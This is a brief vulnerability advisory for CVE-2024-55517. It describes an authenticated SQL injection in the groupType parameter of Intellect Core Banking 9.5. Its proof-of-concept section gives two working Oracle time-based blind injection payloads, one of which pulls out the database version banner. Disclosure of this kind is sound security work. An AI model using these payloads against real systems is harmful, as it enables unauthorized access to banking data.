# CVE-2024-55517 Intellect Core Banking | Writer | Version | Last Updated | | -------- | -------- | -------- | | Nguyen Hong Phuc | The final | 08/01/2025 | ## Description An issue was discovered in the Interllect Core Search in Polaris FT. Input passed through the groupType parameter in /SCGController is mishandled before being used in SQL queries, allowing SQL injection in an authenticated session. ## Target Intellect Core Banking 9.5 ## PoC Manipulate the input value sent to the database to execute SQLi with the command SLEEP(10).  ``` 02%' AND 4528=(CASE WHEN (ASCII(SUBSTR((SELECT NVL(CAST(banner AS VARCHAR(4000)),CHR(32)) FROM v$version WHERE ROWNUM=1),69,1))>104) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(89)||CHR(105)||CHR(109),10) ELSE 4528 END) AND 'gtXl%'='gtXl ``` OR ``` ' OR 1=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(66)||CHR(67),10)-- ``` ## Reference > http://intellect.com > http://polaris.com